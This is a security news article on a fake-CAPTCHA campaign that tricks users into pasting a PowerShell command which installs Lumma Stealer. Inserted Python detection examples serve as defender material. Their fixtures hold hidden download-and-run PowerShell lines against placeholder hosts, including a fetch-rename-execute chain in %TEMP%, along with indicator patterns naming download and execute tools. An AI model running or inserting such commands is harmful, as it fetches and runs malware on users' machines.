Beware: Fake CAPTCHA Scams Spreading Lumma Stealer Malware

Cybercriminals have been aggressively distributing Lumma Stealer malware through fake Captcha campaigns, targeting over 1.4 million users in the past month. The malware is designed to steal sensitive user data and poses a serious threat to online security.

The latest Captcha-style attack targets GitHub users with a phishing email that claims a security vulnerability has been found and directs them to a malicious website, likely designed to steal credentials or compromise repositories.

The phishing attacks are designed to trick users into visiting a phony Captcha screen, which prompts them to click a button; that click silently copies a malicious script onto the user’s clipboard.

The instructions that follow, frequently disguised as a verification step, direct the user to paste and execute the script, which ultimately infects the system.

[Image: fake Captcha screen]

The malicious PowerShell script connects to a remote C&C server to fetch additional malware. It’s designed to download and run the Lumma Stealer malware or an intermediary file that will later install it, compromising the victim’s system.

The “I’m not a robot” button triggers a JavaScript script that copies a PowerShell command to the user’s clipboard. Once pasted and executed, this command downloads and runs another PowerShell script from https://github-scanner[.]com/download.txt.

[Image: small JavaScript]
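As an added example (not code from the article or from Gen Digital), the following Python script performs the kind of static check a defender can run over a captured copy of a suspicious page: it flags pages that both write to the clipboard and carry a string literal shaped like a hidden PowerShell download-and-run command, which is exactly the "I'm not a robot" trick described above. The page fixtures, the `.invalid` host and the indicator lists are constructed assumptions, not anything taken from the real campaign.

```python
"""Static check for ClickFix-style clipboard lures in a captured web page.

Added example, not code from the article or from Gen Digital. The page
fixtures, the .invalid host and the indicator lists below are constructed
assumptions about what such a lure contains.
"""
import html
import re
from dataclasses import dataclass, field

# APIs a page uses to place text on the visitor's clipboard.
CLIPBOARD_APIS = re.compile(
    r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]\s*\)", re.I)

# Traits of a copied string that only make sense if it is meant to be executed.
INDICATORS = {
    "powershell": re.compile(r"\bpowershell(\.exe)?\b", re.I),
    "hidden_window": re.compile(r"-(w|windowstyle)\s+hidden", re.I),
    "download": re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|curl)\b",
        re.I),
    "execute": re.compile(r"\b(iex|invoke-expression|start-process|mshta)\b", re.I),
    "encoded": re.compile(r"-(e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
}

SCRIPT_BODY = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
EVENT_HANDLER = re.compile(r"\son\w+\s*=\s*([\"'])(.*?)\1", re.I | re.S)
# A JavaScript string literal: a quote, a body that may contain escapes,
# and the matching closing quote.
STRING_LITERAL = re.compile(r"""(["'`])((?:\\.|(?!\1).)*)\1""", re.S)


@dataclass
class Finding:
    payload: str
    indicators: list = field(default_factory=list)


def _script_text(page: str) -> str:
    """Collect the parts of the page that run as JavaScript: <script> bodies
    and inline on*="..." handlers (entity-decoded)."""
    parts = [m.group(1) for m in SCRIPT_BODY.finditer(page)]
    parts += [html.unescape(m.group(2)) for m in EVENT_HANDLER.finditer(page)]
    return "\n".join(parts)


def find_clipboard_lures(page: str, min_indicators: int = 2) -> list:
    """Return string literals that look like a download-and-run command, but
    only when the page also writes to the clipboard (the ClickFix shape).
    Obfuscated or concatenated payloads need dynamic analysis instead."""
    js = _script_text(page)
    if not CLIPBOARD_APIS.search(js):
        return []
    findings = []
    for m in STRING_LITERAL.finditer(js):
        literal = m.group(2)
        hits = [name for name, rx in INDICATORS.items() if rx.search(literal)]
        if len(hits) >= min_indicators:
            findings.append(Finding(literal, hits))
    return findings


# Constructed fixture: the shape of a fake-CAPTCHA page (placeholder host).
LURE_PAGE = """
<div class="captcha-box">
  <p>Verification step: press Win+R, then Ctrl+V, then Enter.</p>
  <button onclick="verify()">I'm not a robot</button>
</div>
<script>
  const cmd = 'powershell -w hidden -c "iwr http://verify.example.invalid/d.txt | iex"';
  function verify() { navigator.clipboard.writeText(cmd); }
</script>
"""

# Constructed fixture: a legitimate "copy coupon code" button, which must not alert.
BENIGN_PAGE = """
<button onclick="navigator.clipboard.writeText('SPRING25')">Copy code</button>
"""

if __name__ == "__main__":
    for name, page in (("lure", LURE_PAGE), ("benign", BENIGN_PAGE)):
        for f in find_clipboard_lures(page):
            print(f"{name}: {f.indicators} -> {f.payload}")
```

The check deliberately requires two signals together, clipboard access plus an executable-looking literal, because either one alone is common on legitimate pages (copy buttons, code snippets in documentation). Pages that assemble the command at runtime or decode it from base64 will slip past a literal scan, so this is a cheap first filter in front of sandbox detonation, not a replacement for it.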

The script connects to a remote command-and-control server, retrieves a malicious executable named l6E.exe, saves it as SysSetup.exe in a temporary directory, and then runs the downloaded file, potentially resulting in further system compromise.
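Added example (not the article's or Gen Digital's code): a small Python triage routine for PowerShell script-block log records (Event ID 4104) that looks for the chain just described, that is, a download whose local file name differs from the remote one, a drop into the temporary directory, and execution of that dropped file, plus the first-stage pattern of piping fetched content straight into the interpreter. The log records and the host name are constructed; only the file names l6E.exe and SysSetup.exe come from the article, and the rule names are this example's own.

```python
"""Triage of PowerShell script-block log records (Event ID 4104) for the
download, rename and execute chain described in the article.

Added example, not code from the article or from Gen Digital. The records
below and the host name are constructed; only the file names l6E.exe and
SysSetup.exe come from the article.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlparse

URL = re.compile(r"https?://[^\s'\"()]+", re.I)
OUTFILE = re.compile(r"-OutFile\s+['\"]?([^\s'\";]+)", re.I)
DOWNLOADFILE = re.compile(
    r"DownloadFile\(\s*['\"]([^'\"]+)['\"]\s*,\s*['\"]([^'\"]+)['\"]", re.I)
ASSIGN = re.compile(r"\$(\w+)\s*=\s*['\"]?([^'\";]+)")
FETCH = re.compile(r"\b(iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString)\b", re.I)
EXEC = re.compile(r"\b(iex|Invoke-Expression)\b", re.I)
RUN = re.compile(r"(?:Start-Process|^&)\s+(?:-FilePath\s+)?['\"]?([^\s'\"]+)", re.I)
TEMP_DIR = re.compile(r"\$env:(TEMP|TMP)\b|\\Temp\\", re.I)


@dataclass
class Alert:
    record_id: int
    rule: str
    detail: str


def _statements(script: str) -> list:
    """Split a script block into statements on ';' and newlines
    (pipelines such as 'iwr ... | iex' stay together)."""
    return [s.strip() for s in re.split(r"[;\n]", script) if s.strip()]


def _basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].lower()


def triage_script_block(record_id: int, script: str) -> list:
    """Return alerts for one 4104 record."""
    alerts = []
    variables = {}   # $name -> literal value, so '$p' resolves to its path
    downloaded = {}  # local basename -> remote basename
    for stmt in _statements(script):
        for name, value in ASSIGN.findall(stmt):
            variables[name] = value.strip()
        for name, value in variables.items():
            stmt = re.sub(rf"\${re.escape(name)}\b", lambda _m, v=value: v, stmt)

        # Rule 1: remote content piped straight into the interpreter.
        if FETCH.search(stmt) and EXEC.search(stmt):
            alerts.append(Alert(record_id, "download_and_execute_in_memory", stmt))
            continue

        # Rule 2: a download written to disk; compare remote and local names.
        url = URL.search(stmt)
        dest = OUTFILE.search(stmt)
        if url and dest:
            remote, local_path = url.group(0), dest.group(1)
        else:
            dl = DOWNLOADFILE.search(stmt)
            remote, local_path = (dl.group(1), dl.group(2)) if dl else (None, None)
        if remote and local_path:
            remote_name = _basename(urlparse(remote).path)
            local_name = _basename(local_path)
            downloaded[local_name] = remote_name
            if remote_name != local_name:
                alerts.append(Alert(record_id, "renamed_on_download",
                                    f"{remote_name} saved as {local_name}"))
            if TEMP_DIR.search(local_path):
                alerts.append(Alert(record_id, "dropped_in_temp", local_path))

        # Rule 3: a file fetched earlier in this block is now executed.
        run = RUN.search(stmt)
        if run and _basename(run.group(1)) in downloaded:
            target = _basename(run.group(1))
            alerts.append(Alert(record_id, "executes_downloaded_file",
                                f"{target} (fetched as {downloaded[target]})"))
    return alerts


def triage_all(records) -> list:
    """records: iterable of (record_id, script_text) pairs."""
    out = []
    for record_id, script in records:
        out.extend(triage_script_block(record_id, script))
    return out


# Constructed 4104 records (placeholder host, not real infrastructure).
SAMPLE_RECORDS = [
    # Stage 1: fetch a second-stage script and run it without touching disk.
    (101, "iwr http://stage.example.invalid/download.txt | iex"),
    # Stage 2: fetch l6E.exe, store it as SysSetup.exe under %TEMP%, run it.
    (102, '$p = "$env:TEMP\\SysSetup.exe"; '
          "Invoke-WebRequest -Uri http://stage.example.invalid/l6E.exe -OutFile $p; "
          "Start-Process $p"),
    # Routine administration, which must produce no alert.
    (103, "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB"),
]

if __name__ == "__main__":
    for a in triage_all(SAMPLE_RECORDS):
        print(f"record {a.record_id}: {a.rule}: {a.detail}")
```

Script-block logging must be enabled for these records to exist, and the variable resolution here handles only simple `$name = "literal"` assignments within one block; a dropper that builds its path across several blocks or with string operations will need the records correlated by process id before this logic is applied.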

The heatmap reveals a global spread of fake Captcha campaigns, with Italy, Argentina, France, Spain, and Brazil experiencing the highest concentration of attacks. Over 1.4 million unique users were protected in the past four weeks, underscoring the widespread nature of these threats.

[Image: downloading and executing additional PowerShell scripts]

The published IoCs point to a C&C server hosted on github-scanner[.]com, the PowerShell script used for the malicious activity, and the Lumma Stealer payload, suggesting a coordinated effort to compromise systems and steal sensitive data.

Gen Digital advises users to avoid executing scripts from unknown sources and to verify the authenticity of suspicious emails in order to prevent unauthorized access to their repositories.

To strengthen account security against threats like Lumma Stealer, enable two-factor authentication and use a reputable antivirus solution from providers such as Gen, which safeguards digital assets by detecting and blocking malicious activity.

Kaaviya, https://cyberpress.org/
Kaaviya is a Security Editor and fellow reporter with Cyber Press. She covers cyber security incidents happening in cyberspace.
